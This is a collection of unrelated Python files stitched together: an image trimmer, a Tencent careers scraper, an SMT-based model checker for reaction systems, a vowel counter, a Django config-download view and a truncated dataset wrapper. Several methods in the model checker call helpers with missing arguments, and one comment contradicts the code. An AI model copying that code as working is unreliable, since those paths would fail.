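#   -> (0.1, 0.1, 0.6, 0.5), the tightest box covering both inputs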
|
__all__ = [
"LaMetricManager", "SimpleFrame", "GoalFrame", "SpikeChart",
"Sound", "Model", "CloudSession", "LocalSession"
]
from .lmnotify import LaMetricManager
from .models import SimpleFrame, GoalFrame, SpikeChart, Sound, Model
from .session import CloudSession, LocalSession
|
#!/usr/bin/env python
import sys
import numpy as np
import cv2
print sys.argv[1]
img = cv2.imread(sys.argv[1],0)
img1 = cv2.imread(sys.argv[1],0)
numnonzerorows = (img !=0).sum(1)
zeroindexvec = np.where(numnonzerorows == 0)[0]
img = np.delete(img,zeroindexvec, axis=0)
img = img.transpose()
numnonzerorows = (img !=0).sum(1)
zeroindexvec = np.where(numnonzerorows == 0)[0]
img = np.delete(img,zeroindexvec, axis=0)
img = img.transpose()
print 'Before:'
print img1.shape
print 'After:'
print img.shape
img = cv2.resize(img, (224,224)) # Resize the trimmed image to 224x224
print 'Image resize'
print img.shape
cv2.imwrite(sys.argv[1],img)
|
#encoding: utf-8
import time
import json
import random
import requests
ua_list = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)',
]
class TencentSpider(object):
def __init__(self):
self.one_url = 'https://careers.tencent.com/tencentcareer/api/post/Query?timestamp=1563912271089&countryId=&cityId=&bgIds=&productId=&categoryId=&parentCategoryId=&attrId=&keyword=&pageIndex={}&pageSize=10&language=zh-cn&area=cn'
self.two_url = 'https://careers.tencent.com/tencentcareer/api/post/ByPostId?timestamp=1563912374645&postId={}&language=zh-cn'
        self.f = open('tencent.json', 'a')  # open the output file
        self.item_list = []  # holds the scraped item dicts
    # helper: fetch a URL and return the parsed JSON response
def get_page(self, url):
headers = {'User-Agent': random.choice(ua_list)}
html = requests.get(url=url, headers=headers).text
        html = json.loads(html)  # convert the JSON string into Python data
return html
    # main routine: fetch all job data
def parse_page(self, one_url):
html = self.get_page(one_url)
        for job in html['Data']['Posts']:
            item = {}  # create a fresh dict per job so the list entries stay independent
            item['name'] = job['RecruitPostName']  # job title
            post_id = job['PostId']  # PostId, needed to build the detail-page URL
            # build the detail-page URL and fetch the duties and requirements
            two_url = self.two_url.format(post_id)
            item['duty'], item['require'] = self.parse_two_page(two_url)
            print(item)
            self.item_list.append(item)  # add to the result list
    # helper: parse a detail (second-level) page
def parse_two_page(self, two_url):
html = self.get_page(two_url)
        duty = html['Data']['Responsibility']  # job responsibilities
        duty = duty.replace('\r\n', '').replace('\n', '')  # strip newlines
        require = html['Data']['Requirement']  # job requirements
        require = require.replace('\r\n', '').replace('\n', '')  # strip newlines
return duty, require
    # get the total number of result pages
def get_numbers(self):
url = self.one_url.format(1)
html = self.get_page(url)
        numbers = int(html['Data']['Count']) // 10 + 1  # 10 postings per page
return numbers
def main(self):
number = self.get_numbers()
for page in range(1, 3):
one_url = self.one_url.format(page)
self.parse_page(one_url)
        # save the results to a local JSON file with json.dump
json.dump(self.item_list, self.f, ensure_ascii=False)
self.f.close()
if __name__ == '__main__':
start = time.time()
spider = TencentSpider()
spider.main()
end = time.time()
    print('Elapsed time: %.2f' % (end - start))
|
"""
SMT-based Model Checking Module for RS with Concentrations and Context Automaton
"""
from z3 import *
from time import time
from sys import stdout
from itertools import chain
import resource
from colour import *
from logics import rsLTL_Encoder
from logics import ParamConstr_Encoder
from rs.reaction_system_with_concentrations_param import ParameterObj, is_param
# def simplify(x):
# return x
def z3_max(a, b):
return If(a > b, a, b)
class SmtCheckerRSCParam(object):
def __init__(self, rsca, optimise=False):
rsca.sanity_check()
if not rsca.is_concentr_and_param_compatible():
raise RuntimeError(
"RS and CA with concentrations (and parameters) expected")
self.rs = rsca.rs
self.ca = rsca.ca
self.optimise = optimise
self.initialise()
def initialise(self):
"""Initialises all the variables used by the checker"""
# "Currently" used variables (loaded from self.path_v...)
self.v = None
self.v_ctx = None
self.ca_state = None
# intermediate products:
self.v_improd = None
self.v_improd_for_entities = None
# Per-path variables
self.path_v = dict()
self.path_v_ctx = dict()
self.path_ca_state = dict()
# intermediate products:
self.path_v_improd = dict()
self.path_v_improd_for_entities = dict()
# parameters:
self.v_param = dict()
self.next_level_to_encode = 0
#
# WARNING: improd vs. improducible
# there is some confusion related to the variable naming:
#
# * improd - intermediate products
        # * improducible - entities that are never produced (there is no reaction that produces that entity)
#
# TODO: number of loops == number of paths
self.loop_position = None
self.path_loop_position = dict()
if self.optimise:
self.solver = Optimize()
else:
self.solver = Solver() # For("QF_FD")
self.verification_time = None
self.prepare_param_variables()
def reset(self):
"""Reinitialises the state of the checker"""
self.initialise()
def prepare_all_variables(self, num_of_paths):
for path_idx in range(num_of_paths):
self.prepare_all_path_variables(path_idx)
self.next_level_to_encode += 1
def prepare_all_path_variables(self, path_idx):
"""Prepares the variables for a given path index"""
print_info("Preparing variables for path={:d} (level={:d})".format(
path_idx, self.next_level_to_encode))
self.prepare_state_variables(path_idx)
self.prepare_context_variables(path_idx)
self.prepare_intermediate_product_variables(path_idx)
self.prepare_loop_position_variables(path_idx)
def prepare_loop_position_variables(self, path_idx):
"""Prepares the variables for loop positions"""
self.path_loop_position[path_idx] = Int(
"p{:d}_loop_pos".format(path_idx))
def prepare_context_variables(self, path_idx):
"""Prepares all the context variables"""
level = self.next_level_to_encode
self.path_v_ctx.setdefault(path_idx, [])
assert len(self.path_v_ctx[path_idx]) == level
variables = []
for entity in self.rs.background_set:
new_var = Int("p{:d}C{:d}_{:s}".format(path_idx, level, entity))
variables.append(new_var)
self.path_v_ctx[path_idx].append(variables)
def prepare_state_variables(self, path_idx):
"""Prepares all the state variables"""
level = self.next_level_to_encode
# RS vars
self.path_v.setdefault(path_idx, [])
assert len(self.path_v[path_idx]) == level
variables = []
for entity in self.rs.background_set:
new_var = Int("p{:d}L{:d}_{:s}".format(path_idx, level, entity))
variables.append(new_var)
self.path_v[path_idx].append(variables)
# Context automaton states:
self.path_ca_state.setdefault(path_idx, [])
assert len(self.path_ca_state[path_idx]) == level
ca_state_var = Int("p{:d}CA{:d}_state".format(path_idx, level))
self.path_ca_state[path_idx].append(ca_state_var)
def prepare_intermediate_product_variables(self, path_idx):
"""
Prepares the intermediate product variables
carrying the individual concentration levels produced
by the reactions.
These variables are used later on to encode the final
concentration levels for all the entities
"""
level = self.next_level_to_encode
self.path_v_improd.setdefault(path_idx, [])
self.path_v_improd_for_entities.setdefault(path_idx, [])
if level < 1:
#
# If we are at level==0, we add a dummy "level"
            # to match the indices of the successors
# which are always at level+1.
#
self.path_v_improd[path_idx].append(None)
self.path_v_improd_for_entities[path_idx].append(None)
reactions_dict = dict()
number_of_reactions = len(self.rs.reactions)
all_entities_dict = dict()
for reaction in self.rs.reactions:
*_, products = reaction
reaction_id = self.rs.reactions.index(reaction)
entities_dict = dict()
if is_param(products):
for entity in self.rs.set_of_bgset_ids:
entity_name = self.rs.get_entity_name(entity)
new_var = Int("p{:d}L{:d}_ImProd_r{:d}_{:s}".format(
path_idx, level, reaction_id, entity_name))
entities_dict[entity] = new_var
all_entities_dict.setdefault(entity, [])
all_entities_dict[entity].append(new_var)
else:
for entity, conc in products:
entity_name = self.rs.get_entity_name(entity)
new_var = Int("p{:d}L{:d}_ImProd_r{:d}_{:s}".format(
path_idx, level, reaction_id, entity_name))
entities_dict[entity] = new_var
all_entities_dict.setdefault(entity, [])
all_entities_dict[entity].append(new_var)
reactions_dict[reaction_id] = entities_dict
self.path_v_improd[path_idx].append(reactions_dict)
self.path_v_improd_for_entities[path_idx].append(all_entities_dict)
def prepare_param_variables(self):
"""
Prepares variables for parameters
A parameter (it's valuation) is a subset of the background set,
therefore we need separate variables for each element of the
background set.
"""
for param_name in self.rs.parameters.keys():
# we start collecting bg-related vars for the given param
vars_for_param = []
for entity in self.rs.ordered_list_of_bgset_ids:
new_var = Int(
"Pm{:s}_{:s}".format(
param_name, self.rs.get_entity_name(entity)))
vars_for_param.append(new_var)
self.v_param[param_name] = vars_for_param
def get_enc_param(self, param_name, entity_name):
"""
Returns encoded param[entity_name]
"""
entity_id = self.rs.get_entity_id(entity_name)
return self.v_param[param_name][entity_id]
def load_varset_for_path(self, path_idx):
"""
        Loads the variables for the path with the given path_idx
"""
self.v = self.path_v[path_idx]
self.v_ctx = self.path_v_ctx[path_idx]
self.ca_state = self.path_ca_state[path_idx]
self.v_improd = self.path_v_improd[path_idx]
self.v_improd_for_entities = self.path_v_improd_for_entities[path_idx]
self.loop_position = self.path_loop_position[path_idx]
def enc_param_concentration_levels_assertion(self):
"""
Assertions for the parameter variables
"""
if len(self.v_param) == 0:
return True
enc_param_gz = True
enc_non_empty = True
for param_vars in self.v_param.values():
enc_param_at_least_one = False
for pvar in param_vars:
# TODO: fixed upper limit: 100 (have a per-param setting for that)
enc_param_gz = simplify(
And(enc_param_gz, pvar >= 0, pvar < 100))
enc_param_at_least_one = simplify(
Or(enc_param_at_least_one, pvar > 0))
enc_non_empty = simplify(
And(enc_non_empty, enc_param_at_least_one))
return simplify(And(enc_param_gz, enc_non_empty))
def assert_param_optimisation(self):
for param_vars in self.v_param.values():
for pvar in param_vars:
# self.solver.add_soft(pvar == 0)
self.solver.minimize(pvar)
def enc_concentration_levels_assertion(self, level, path_idx):
"""
Encodes assertions that (some) variables need to be >=0
We do not need to actually control all the variables,
only those that can possibly go below 0.
"""
print_info("Concentration level assertions for path={:d} (level={:d})".format(
path_idx, level))
enc_gz = True
for e_i in self.rs.set_of_bgset_ids:
var = self.path_v[path_idx][level][e_i]
var_ctx = self.path_v_ctx[path_idx][level][e_i]
e_max = self.rs.get_max_concentration_level(e_i)
enc_gz = simplify(And(enc_gz, var >= 0, var_ctx >=
0, var <= e_max, var_ctx <= e_max))
vars_per_reaction = self.path_v_improd_for_entities[path_idx][
level + 1]
if e_i in vars_per_reaction:
for var_improd in vars_per_reaction[e_i]:
enc_gz = simplify(
And(enc_gz, var_improd >= 0, var_improd <= e_max))
return enc_gz
def enc_init_state(self, level, path_idx):
"""Encodes the initial state at the given level"""
rs_init_state_enc = True
for v in self.path_v[path_idx][level]:
# the initial concentration levels are zeroed
rs_init_state_enc = simplify(And(rs_init_state_enc, v == 0))
ca_init_state_enc = self.path_ca_state[path_idx][level] == self.ca.get_init_state_id(
)
init_state_enc = simplify(And(rs_init_state_enc, ca_init_state_enc))
return init_state_enc
def enc_transition_relation(self, level, path_idx):
return simplify(
And(self.enc_rs_trans(level, path_idx),
self.enc_automaton_trans(level, path_idx)))
def enc_param_sanity_for_reactions(self):
"""R < I constraint (R n I = 0)"""
rct_inh_constr = True
for reactants, inhibitors, products in self.rs.reactions:
if is_param(reactants) or is_param(inhibitors):
# 1. R and I
if is_param(reactants) and is_param(inhibitors):
rct_param_name = reactants.name
inh_param_name = inhibitors.name
for entity in self.rs.set_of_bgset_ids:
rct_inh_constr = And(rct_inh_constr,
Implies(
self.v_param
[inh_param_name][entity] > 0,
self.v_param
[rct_param_name][entity] <
self.v_param
[inh_param_name][entity]))
elif (not is_param(reactants)) and is_param(inhibitors):
inh_param_name = inhibitors.name
for entity, conc in reactants:
assert conc > 0, "Unexpected concentration level!"
rct_inh_constr = And(
rct_inh_constr,
Implies(
self.v_param[inh_param_name][entity] > 0, conc <
self.v_param[inh_param_name][entity]))
elif is_param(reactants) and (not is_param(inhibitors)):
rct_param_name = reactants.name
for entity, conc in inhibitors:
assert conc > 0, "Unexpected concentration level!"
rct_inh_constr = And(
rct_inh_constr, self.v_param[rct_param_name][entity] < conc)
return rct_inh_constr
def enc_single_reaction(self, level, path_idx, reaction):
"""
Encodes a single reaction
For encoding the products we use intermediate variables:
* each reaction has its own product variables,
* those are meant to be used to compute the MAX concentration
"""
reactants, inhibitors, products = reaction
# we need reaction_id to find the intermediate product variable
reaction_id = self.rs.reactions.index(reaction)
# ** REACTANTS *******************************************
enc_reactants = True
if is_param(reactants):
param_name = reactants.name
for entity in self.rs.set_of_bgset_ids:
enc_reactants = And(enc_reactants, Or(
self.v_param[param_name][entity] == 0,
self.path_v[path_idx][level][entity] >= self.v_param[param_name][entity],
self.path_v_ctx[path_idx][level][entity] >= self.v_param[param_name][entity]))
else:
for entity, conc in reactants:
enc_reactants = And(enc_reactants, Or(
self.path_v[path_idx][level][entity] >= conc,
self.path_v_ctx[path_idx][level][entity] >= conc))
# ** INHIBITORS ******************************************
enc_inhibitors = True
if is_param(inhibitors):
param_name = inhibitors.name
for entity in self.rs.set_of_bgset_ids:
enc_inhibitors = And(enc_inhibitors, Or(
self.v_param[param_name][entity] == 0,
And(
self.path_v[path_idx][level][entity] < self.v_param[param_name][entity],
self.path_v_ctx[path_idx][level][entity] < self.v_param[param_name][entity])))
else:
for entity, conc in inhibitors:
enc_inhibitors = And(enc_inhibitors, And(
self.path_v[path_idx][level][entity] < conc,
self.path_v_ctx[path_idx][level][entity] < conc))
# ** PRODUCTS *******************************************
enc_products = True
if is_param(products):
param_name = products.name
for entity in self.rs.set_of_bgset_ids:
enc_products = simplify(
And(
enc_products, self.
path_v_improd[path_idx]
[level + 1][reaction_id]
[entity] == self.v_param
[param_name][entity]))
else:
for entity, conc in products:
enc_products = simplify(And(
enc_products, self.path_v_improd[path_idx][level + 1][reaction_id][entity] == conc))
# Nothing is produced (when the reaction is disabled)
enc_no_prod = True
if is_param(products):
for entity in self.rs.set_of_bgset_ids:
enc_no_prod = And(
enc_no_prod, self.path_v_improd[path_idx][level + 1][reaction_id][entity] == 0)
else:
for entity, _ in products:
enc_no_prod = simplify(And(
enc_no_prod, self.path_v_improd[path_idx][level + 1][reaction_id][entity] == 0))
#
# (R and I) iff P
#
enc_enabled = And(enc_reactants, enc_inhibitors) == enc_products
#
# ~(R and I) iff P_zero
#
enc_not_enabled = Not(
And(enc_reactants, enc_inhibitors)) == enc_no_prod
enc_reaction = And(enc_enabled, enc_not_enabled)
return enc_reaction
def enc_general_reaction_enabledness(self, level, path_idx):
"""
General enabledness condition for reactions
The necessary condition for a reaction to be enabled is
that the state is not empty, i.e., at least one entity
is present in the current state.
This condition must be used when there are parametric reactions
because a parameter could have all of its entities set to zero, which
immediately satisfies every reactant condition: (entity >= param)
degenerates to (entity >= 0), which always holds.
"""
enc_cond = False
for entity in self.rs.set_of_bgset_ids:
enc_cond = simplify(
Or(enc_cond, self.path_v[path_idx][level][entity] > 0, self.path_v_ctx[path_idx][level][entity] > 0))
return enc_cond
def enc_rs_trans(self, level, path_idx):
"""Encodes the transition relation"""
#
# IMPORTANT NOTE
#
# We need to make sure we do something about the UNUSED ENTITIES
# that is, those that are never produced.
#
# They should have concentration levels set to 0.
#
# That needs to happen automatically (in the MAX encoding) -- for the parametric
# case it makes no sense to identify the entities that are never produced, unless
# we have no parameters as products (special case, so that could be an
# optimisation)
#
enc_trans = True
for reaction in self.rs.reactions:
enc_reaction = self.enc_single_reaction(level, path_idx, reaction)
enc_trans = simplify(And(enc_trans, enc_reaction))
# Next we encode the MAX concentration values:
# we collect those from the intermediate product variables
enc_max_prod = True
# Save all the intermediate product variables for a given level:
#
# - Intermediate products of (level+1) correspond to the next level
#
# {reactants & inhibitors}[level]
# =>
# {improd}[level+1]
# =>
# {products}[level+1]
#
current_v_improd_for_entities = self.path_v_improd_for_entities[path_idx][level + 1]
for entity in self.rs.set_of_bgset_ids:
per_reaction_vars = current_v_improd_for_entities.get(entity, [])
enc_max_prod = simplify(And(
enc_max_prod, self.path_v[path_idx][level + 1][entity] == self.enc_max(per_reaction_vars)))
# make sure at least one entity is >0
enc_general_cond = self.enc_general_reaction_enabledness(
level, path_idx)
enc_trans_with_max = simplify(
And(enc_general_cond, enc_max_prod, enc_trans))
# print(enc_trans_with_max)
return enc_trans_with_max
def enc_max(self, elements):
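"""Encodes max(0, elements): returns 0 for an empty list, otherwise folds the z3_max helper so the result is never below zero."""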
enc = None
if elements == []:
enc = 0
elif len(elements) == 1:
enc = z3_max(0, elements[0])
elif len(elements) > 1:
enc = 0
for i in range(len(elements) - 1):
enc = z3_max(enc, z3_max(elements[i], elements[i + 1]))
return enc
def enc_automaton_trans(self, level, path_idx):
"""Encodes the transition relation for the context automaton"""
enc_trans = False
for src, ctx, dst in self.ca.transitions:
src_enc = self.path_ca_state[path_idx][level] == src
dst_enc = self.path_ca_state[path_idx][level+1] == dst
all_ent = set(range(len(self.rs.background_set)))
incl_ctx = set([e for e, c in ctx])
excl_ctx = all_ent - incl_ctx
ctx_enc = True
for e, c in ctx:
ctx_enc = simplify(
And(ctx_enc, self.path_v_ctx[path_idx][level][e] == c))
for e in excl_ctx:
ctx_enc = simplify(
And(ctx_enc, self.path_v_ctx[path_idx][level][e] == 0))
cur_trans = simplify(And(src_enc, ctx_enc, dst_enc))
enc_trans = simplify(Or(enc_trans, cur_trans))
return enc_trans
def enc_exact_state(self, level, state):
"""Encodes the state at the given level with the exact concentration values"""
raise RuntimeError("Should not be used with RSC")
def enc_min_state(self, level, state):
"""Encodes the state at the given level with the minimal required concentration levels"""
enc = True
for ent, conc in state:
e_id = self.rs.get_entity_id(ent)
enc = And(enc, self.v[level][e_id] >= conc)
return simplify(enc)
def enc_state_with_blocking(self, level, prop):
"""Encodes the state at the given level with blocking certain concentrations"""
required, blocked = prop
enc = True
for ent, conc in required:
e_id = self.rs.get_entity_id(ent)
enc = And(enc, self.v[level][e_id] >= conc)
for ent, conc in blocked:
e_id = self.rs.get_entity_id(ent)
enc = And(enc, self.v[level][e_id] < conc)
return simplify(enc)
def decode_witness(self, max_level, path_idx, print_model=False):
"""
Decodes the witness
Also decodes the parameters
"""
m = self.solver.model()
if print_model:
print(m)
for level in range(max_level + 1):
print("\n{: >70}".format("[ level=" + repr(level) + " ]"))
print(" State: {", end=""),
for var_id in range(len(self.path_v[path_idx][level])):
var_rep = repr(m[self.path_v[path_idx][level][var_id]])
if not var_rep.isdigit():
raise RuntimeError(
"unexpected: representation is not a positive integer")
if int(var_rep) > 0:
print(
" " + self.rs.get_entity_name(var_id) + "=" + var_rep,
end="")
print(" }")
if level != max_level:
print(" Context set: ", end="")
print("{", end="")
for var_id in range(len(self.path_v[path_idx][level])):
var_rep = repr(m[self.path_v_ctx[path_idx][level][var_id]])
if not var_rep.isdigit():
raise RuntimeError(
"unexpected: representation is not a positive integer")
if int(var_rep) > 0:
print(
" " + self.rs.get_entity_name(var_id) + "=" + var_rep,
end="")
print(" }")
print()
def get_enc_formulae(self, encoder, formulae_list):
enc_form = []
for path_idx, formula in enumerate(formulae_list):
print_info("Generating the encoding for {:s} ({:d} of {:d})".format(
str(formula), path_idx+1, len(formulae_list)))
encoder.load_variables(
var_rs=self.path_v[path_idx],
var_ctx=self.path_v_ctx[path_idx],
var_loop_pos=self.path_loop_position[path_idx])
enc_form.append(encoder.get_encoding(formula, self.current_level))
ncalls = encoder.get_ncalls()
print_info("Cache hits: {:d}, encode calls: {:d} (approx: {:d})".format(
encoder.get_cache_hits(), ncalls[0], ncalls[1]))
encoder.flush_cache()
return enc_form
def print_witness(self, formulae_list):
for path_idx, formula in enumerate(formulae_list):
print("\n{:=^70}".format("[ WITNESS ]"))
print("\n Witness for: {:s}".format(str(formula)))
self.decode_witness(self.current_level, path_idx)
self.print_parameter_valuations()
def print_parameter_valuations(self):
m = self.solver.model()
print("\n Parameters:\n")
for param_name in sorted(self.rs.parameters.keys()):
print("{: >6}: ".format(param_name), end="")
print("{", end="")
params = self.v_param[param_name]
for entity in self.rs.set_of_bgset_ids:
var_rep = repr(m[params[entity]])
if not var_rep.isdigit():
raise RuntimeError(
"unexpected: representation is not a positive integer")
if int(var_rep) > 0:
print(
" " + str(self.rs.get_entity_name(entity)) + "=" +
str(var_rep),
end="")
print(" }")
print()
def enc_concentration_levels_assertions_for_paths(
self, level, num_of_paths):
additional_assertions = []
for path_idx in range(num_of_paths):
additional_assertions.append(
self.enc_concentration_levels_assertion(level, path_idx))
additional_assertions.append(
self.enc_param_concentration_levels_assertion())
return additional_assertions
def enc_transition_relation_for_paths(self, level, num_of_paths):
enc_trans = []
for path_idx in range(num_of_paths):
enc_trans.append(self.enc_transition_relation(level, path_idx))
return enc_trans
def print_level(self):
print(
"{:->70}".format("[ level=" + str(self.current_level) + " done ]"))
def check_rsltl(
self, formulae_list,
print_witness=True,
print_time=True, print_mem=True,
max_level=None, cont_if_sat=False,
param_constr=None):
"""
Bounded Model Checking for rsLTL properties
* print_witness -- prints the decoded witness
* print_time -- prints the time consumed
* print_mem -- prints the memory consumed
* max_level -- if not None, the methods
stops at the specified level
* cont_if_sat -- if True, then the method
continues up until max_level is
reached (even if sat found)
* param_constr -- constraints on parameters
"""
if not isinstance(formulae_list, (list, tuple)):
print_error("Expected a list of formulae")
self.reset()
num_of_paths = len(formulae_list)
print_info("Running rsLTL bounded model checking")
print_info("Tested formulae:")
for form in formulae_list:
print_info(" "*4 + str(form))
print_info("INITIALISING...")
if print_time:
start_time = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.prepare_all_variables(num_of_paths)
self.load_varset_for_path(0)
# initial states for all the paths
initial_states = []
for path_idx in range(num_of_paths):
initial_states.append(self.enc_init_state(0, path_idx))
self.solver_add(initial_states)
self.current_level = 0
# assertions for all the paths and parameters
self.solver_add(
self.enc_concentration_levels_assertions_for_paths(
0, num_of_paths))
self.solver_add(self.enc_param_concentration_levels_assertion())
self.solver_add(self.enc_param_sanity_for_reactions())
encoder = rsLTL_Encoder(self)
if param_constr:
param_contr_encoder = ParamConstr_Encoder(self)
enc_param_constr = param_contr_encoder.encode(param_constr)
self.solver_add(enc_param_constr)
if self.optimise:
self.assert_param_optimisation()
print_info("STARTING TO ITERATE...")
while True:
print(
"\n{:-^70}".format("[ Working at level=" + str(self.current_level) + " ]"))
# reachability test:
self.solver.push()
# Encoding all the formulae
enc_form = self.get_enc_formulae(encoder, formulae_list)
print_info("Adding the formulae to the solver...")
self.solver_add(enc_form)
# Loops encoding
print_info("Adding the encoding for the loops...")
self.solver_add(self.get_loop_encodings())
print_info("Testing satisfiability...")
result = self.solver.check()
if result == sat:
print_positive(green_str(
"SAT at level={:d}".format(self.current_level)))
# print(self.solver.model())
if print_witness:
self.print_witness(formulae_list)
if not cont_if_sat:
break
else:
print_info("UNSAT")
self.solver.pop()
if max_level is not None and self.current_level > max_level:
print_info("As requested, stopping at level=" + str(max_level))
break
self.prepare_all_variables(num_of_paths)
# assertions for all the paths
self.solver_add(
self.enc_concentration_levels_assertions_for_paths(
self.current_level + 1, num_of_paths))
print_info("Unrolling the transition relation")
self.solver_add(self.enc_transition_relation_for_paths(
self.current_level, num_of_paths))
self.print_level()
self.current_level += 1
if print_time:
self.print_time(start_time)
if print_mem:
self.print_mem()
def print_time(self, start):
stop = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.verification_time = stop - start
print()
print_info("{: >60}".format(
" Time: " + repr(self.verification_time) + " s"))
def print_mem(self):
print_info(
"{: >60}".format(
" Memory: " +
repr(
resource.getrusage(resource.RUSAGE_SELF).ru_maxrss /
(1024 * 1024)) + " MB"))
def dummy_unroll(self, levels):
"""Unrolls the variables for testing purposes"""
self.current_level = -1
for i in range(levels+1):
self.prepare_all_variables()
self.current_level += 1
print(C_MARK_INFO + " Dummy Unrolling done.")
def state_equality(self, level_A, level_B):
"""Encodes equality of two states at two different levels"""
eq_enc = True
for e_i in range(len(self.rs.background_set)):
e_i_equality = self.v[level_A][e_i] == self.v[level_B][e_i]
eq_enc = simplify(And(eq_enc, e_i_equality))
eq_enc_ctxaut = self.ca_state[level_A] == self.ca_state[level_B]
eq_enc = simplify(And(eq_enc, eq_enc_ctxaut))
return eq_enc
def get_loop_encodings(self):
k = self.current_level
loop_var = self.loop_position
loop_enc = True
"""
(loop_var == i) means that there is a loop taking back to the state (i-1)
Therefore, the encoding starts at 1, not at 0.
"""
for i in range(1, k+1):
loop_enc = simplify(And(loop_enc, Implies(
loop_var == i, self.state_equality(i-1, k))))
return loop_enc
def solver_add(self, expression):
"""
This is a solver.add() wrapper
"""
if expression == True:
return
if expression == False:
raise RuntimeError("Trying to assert False.")
self.solver.add(expression)
def check_reachability(self, state, print_witness=True,
print_time=True, print_mem=True, max_level=1000):
"""Main testing function"""
self.reset()
if print_time:
# start = time()
start = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.prepare_all_variables()
self.solver_add(self.enc_init_state(0))
self.current_level = 0
self.prepare_all_variables()
self.solver_add(self.enc_concentration_levels_assertion(0))
while True:
self.prepare_all_variables()
self.solver_add(
self.enc_concentration_levels_assertion(
self.current_level + 1))
print(
"\n{:-^70}".format("[ Working at level=" + str(self.current_level) + " ]"))
stdout.flush()
# reachability test:
print("[" + colour_str(C_BOLD, "i") +
"] Adding the reachability test...")
self.solver.push()
self.solver_add(self.enc_state_with_blocking(
self.current_level, state))
result = self.solver.check()
if result == sat:
print(
"[" + colour_str(C_BOLD, "+") + "] " +
colour_str(
C_GREEN, "SAT at level=" + str(self.current_level)))
if print_witness:
print("\n{:=^70}".format("[ WITNESS ]"))
self.decode_witness(self.current_level)
break
else:
self.solver.pop()
print("[" + colour_str(C_BOLD, "i") +
"] Unrolling the transition relation")
self.solver_add(self.enc_transition_relation(self.current_level))
print(
"{:->70}".format("[ level=" + str(self.current_level) + " done ]"))
self.current_level += 1
if self.current_level > max_level:
print("Stopping at level=" + str(max_level))
break
if print_time:
# stop = time()
stop = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.verification_time = stop-start
print()
print(
"\n[i] {: >60}".format(
" Time: " + repr(self.verification_time) + " s"))
if print_mem:
print(
"[i] {: >60}".format(
" Memory: " +
repr(
resource.getrusage(resource.RUSAGE_SELF).ru_maxrss /
(1024 * 1024)) + " MB"))
def get_verification_time(self):
return self.verification_time
def show_encoding(self, state, print_witness=True,
print_time=False, print_mem=False, max_level=100):
"""Encoding debug function"""
self.reset()
self.prepare_all_variables()
init_s = self.enc_init_state(0)
print(init_s)
self.solver_add(init_s)
self.current_level = 0
self.prepare_all_variables()
while True:
self.prepare_all_variables()
print(
"-----[ Working at level=" + str(self.current_level) + " ]-----")
stdout.flush()
# reachability test:
print("[i] Adding the reachability test...")
self.solver.push()
s = self.enc_min_state(self.current_level, state)
print("Test: ", s)
self.solver_add(s)
result = self.solver.check()
if result == sat:
print(
"\n[+] " +
colour_str(
C_RED, "SAT at level=" + str(self.current_level)))
if print_witness:
self.decode_witness(self.current_level)
break
else:
self.solver.pop()
print("[i] Unrolling the transition relation")
t = self.enc_transition_relation(self.current_level)
print(t)
self.solver_add(t)
print("-----[ level=" + str(self.current_level) + " done ]")
self.current_level += 1
if self.current_level > max_level:
print("Stopping at level=" + str(max_level))
break
else:
x = input("Next level? ")
x = x.lower()
if not (x == "y" or x == "yes"):
break
# EOF
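# --- Illustrative sketch (not part of the verifier) ---
# A minimal, standalone example of the "MAX over per-reaction intermediate product
# variables" idea used by enc_single_reaction/enc_rs_trans, assuming the z3 Python
# API. The names below are illustrative, and demo_max is only a stand-in for the
# module's z3_max helper, which is defined elsewhere.
if __name__ == "__main__":
    from z3 import Int, If, Solver, sat as z3_sat

    def demo_max(a, b):
        # plausible max helper: If(a > b, a, b)
        return If(a > b, a, b)

    # per-reaction products of a single entity and its concentration at level+1
    prod_r1, prod_r2 = Int('prod_r1'), Int('prod_r2')
    next_conc = Int('next_conc')
    s = Solver()
    s.add(prod_r1 == 2, prod_r2 == 3)
    s.add(next_conc == demo_max(0, demo_max(prod_r1, prod_r2)))
    assert s.check() == z3_sat
    assert s.model()[next_conc].as_long() == 3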
|
# Program to count the number of vowels in a string
def main():
    text = input("Enter a string: ")
    vowels = {'a', 'e', 'i', 'o', 'u'}
    for vowel in vowels:
        count = text.count(vowel)
        if count > 0:
            print(vowel, "present", count, "times")

if __name__ == '__main__':
    main()
|
# Copyright 2018 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hmac
from django.views import View
from django.views.generic.detail import SingleObjectMixin
from django.http import (
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
HttpResponseNotModified
)
from scionlab.models import Host
from scionlab.util.http import HttpResponseAttachment
from scionlab.util import config_tar
class GetHostConfig(SingleObjectMixin, View):
model = Host
def get(self, request, *args, **kwargs):
host = self.get_object()
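# hmac.compare_digest performs a constant-time comparison, protecting the
# host secret against timing attacks.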
if 'secret' not in request.GET \
or not hmac.compare_digest(request.GET['secret'], host.secret):
return HttpResponseForbidden()
if 'version' in request.GET:
version_str = request.GET['version']
if not version_str.isnumeric():
return HttpResponseBadRequest()
version = int(version_str)
if version >= host.config_version:
return HttpResponseNotModified()
if config_tar.is_empty_config(host):
return HttpResponse(status=204)
# All good, generate and return the config
# Use the response as file-like object to write the tar
filename = '{host}_v{version}.tar.gz'.format(
host=host.path_str(),
version=host.config_version)
resp = HttpResponseAttachment(filename=filename, content_type='application/gzip')
config_tar.generate_host_config_tar(host, resp)
return resp
|
#!/usr/bin/env python
import torch
from torch.utils.data.dataset import Dataset
# Wrapper class to return only subset of samples of original dataset
class MaskedDataset(Dataset):
def __init__(self, dataset, mask=None):
self.dataset = dataset
if mask is not None:
